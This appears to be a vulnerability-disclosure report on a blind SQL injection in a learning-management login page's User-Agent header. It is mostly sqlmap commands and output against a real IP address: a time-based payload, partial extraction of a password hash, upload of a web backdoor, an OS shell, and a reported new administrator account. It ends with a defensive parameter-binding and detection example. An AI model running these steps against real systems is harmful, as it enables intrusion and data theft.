2015-12-30: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-12-31: The vendor has confirmed; details are disclosed to the vendor only.
2016-01-10: Details disclosed to core white hats and experts in related fields.
2016-01-20: Details disclosed to regular white hats.
2016-01-30: Details disclosed to intern white hats.
2016-02-12: Details disclosed to the public.
Waiting for an interview...
The injection point is the User-Agent header of the login page http://106.37.209.144/zlms/portal/sp/login.php.
E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --current-db --current-user
[sqlmap banner: 1.0-dev-nongit-201512100967, http://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:40:30
[23:40:30] [INFO] testing connection to the target URL
[23:40:31] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM
---
[23:40:31] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[23:41:10] [INFO] confirming MySQL
[23:41:10] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[23:41:31] [INFO] adjusting time delay to 4 seconds due to good response times
[23:41:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.10, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0
[23:41:31] [INFO] fetching current user
[23:41:31] [INFO] retrieved: root@localhost
[23:50:59] [ERROR] invalid character detected. retrying..
[23:50:59] [WARNING] increasing time delay to 5 seconds
current user: 'root@localhost'
[23:51:01] [INFO] fetching current database
[23:51:01] [INFO] retrieved: lms
current database: 'lms'

E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --password
[sqlmap banner: 1.0-dev-nongit-201512100967, http://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:14:13
[00:14:13] [INFO] testing connection to the target URL
[00:14:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM
---
[00:14:14] [INFO] testing MySQL
[00:14:14] [INFO] confirming MySQL
[00:14:14] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.10, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0
[00:14:14] [INFO] fetching database users password hashes
[00:14:14] [INFO] fetching database users
[00:14:14] [INFO] fetching number of database users
[00:14:14] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[00:14:26] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y1
[00:14:50] [INFO] retrieved:
[00:15:12] [INFO] adjusting time delay to 1 second due to good response times
'root'@'localhost'
[00:18:28] [INFO] fetching number of password hashes for user 'root'
[00:18:28] [INFO] retrieved: 1
[00:18:35] [INFO] fetching password hashes for user 'root'
[00:18:35] [INFO] retrieved: 4630
[00:19:29] [ERROR] invalid character detected. retrying..
[00:19:29] [WARNING] increasing time delay to 2 seconds
c75c3
[00:21:04] [ERROR] invalid character detected. retrying..
[00:21:04] [WARNING] increasing time delay to 3 seconds
1e0f5b2
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] root [1]:
    password hash: ***********************
Since this is a time-delay injection, dumping data is far too time-consuming, so I just went straight for getshell.
E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --os-shell
[sqlmap banner: 1.0-dev-nongit-201512100967, http://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:59:54
[23:59:54] [INFO] testing connection to the target URL
[23:59:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM
---
[23:59:55] [INFO] testing MySQL
[23:59:55] [INFO] confirming MySQL
[23:59:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.10, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0
[23:59:55] [INFO] going to use a web backdoor for command prompt
[23:59:55] [INFO] fingerprinting the back-end DBMS operating system
[23:59:55] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[23:59:58] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:\ZLMS2\htdocs\
[00:01:30] [WARNING] unable to automatically parse any web server path
[00:01:30] [INFO] trying to upload the file stager on '/ZLMS2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[00:01:31] [INFO] heuristics detected web page charset 'ascii'
[00:01:31] [INFO] the file stager has been successfully uploaded on '/ZLMS2/htdocs/' - http://106.37.209.144:80/tmpuumxu.php
[00:01:31] [INFO] the backdoor has been successfully uploaded on '/ZLMS2/htdocs/' - http://106.37.209.144:80/tmpbbrrj.php
[00:01:31] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[00:06:31] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---
Windows IP Configuration

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix . :
   IP Address. . . . . . . . . . . . : 192.168.86.3
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.86.253
---
webshell
More than 100 internal staff records
Created an administrator account to prove the vulnerability exists.
Filter the input! You should know this better than I do!
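As an added example (not part of this report or of the affected system's code), the pattern behind this class of bug: a login handler that records the User-Agent header into an audit table by splicing it into the SQL text, beside the parameter-bound version that fixes it, plus a header check of the kind the "filter" suggestion implies. The table, the sample header values and the function names are constructed for illustration; SQLite stands in for MySQL, where the SLEEP() call in a probe like this delays the response instead of failing.

```python
import re
import sqlite3

# Constructed sample header values (not taken from the report). PROBE_UA
# follows the shape of the time-based payload sqlmap reported above.
PROBE_UA = "Mozilla/5.0' AND (SELECT * FROM (SELECT(SLEEP(5)))x) AND 'a'='a"
NORMAL_UA = "Mozilla/5.0 (Windows NT 5.1) Firefox/42.0"


def _fresh_db():
    """In-memory stand-in for a login-audit table that stores the User-Agent."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login_log (username TEXT, user_agent TEXT)")
    return db


def log_login_vulnerable(user_agent, username="bob"):
    """Broken pattern: the header is spliced into the statement text, so the
    database parses whatever the client sent as SQL. Returns what happened."""
    db = _fresh_db()
    sql = "INSERT INTO login_log VALUES ('%s', '%s')" % (username, user_agent)
    try:
        db.execute(sql)
    except sqlite3.Error as exc:
        # SQLite has no SLEEP(), so the injected call surfaces as an error;
        # the point is that the header reached the SQL parser at all.
        return "sql error: %s" % exc
    return db.execute("SELECT user_agent FROM login_log").fetchone()[0]


def log_login_safe(user_agent, username="bob"):
    """The fix: bound parameters. The header is passed as data, never parsed,
    so the same probe is stored verbatim and cannot alter the statement."""
    db = _fresh_db()
    db.execute("INSERT INTO login_log VALUES (?, ?)", (username, user_agent))
    return db.execute("SELECT user_agent FROM login_log").fetchone()[0]


# Header check for alerting on login requests: flags quote-then-boolean and
# delay-function shapes. A filter like this is a detection aid only; it does
# not replace parameter binding.
_DELAY_FN = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\s*\(", re.I)
_QUOTE_BOOL = re.compile(r"'\s*(AND|OR)\s", re.I)


def looks_like_sqli_probe(user_agent):
    return bool(_DELAY_FN.search(user_agent) or _QUOTE_BOOL.search(user_agent))


if __name__ == "__main__":
    print("vulnerable:", log_login_vulnerable(PROBE_UA))
    print("safe stored verbatim:", log_login_safe(PROBE_UA) == PROBE_UA)
    print("flagged:", looks_like_sqli_probe(PROBE_UA), looks_like_sqli_probe(NORMAL_UA))
```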
Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2015-12-31 13:53
On confirmation, this system is an abandoned system that is no longer in use. It has now been taken offline. Thanks to Trail-Say.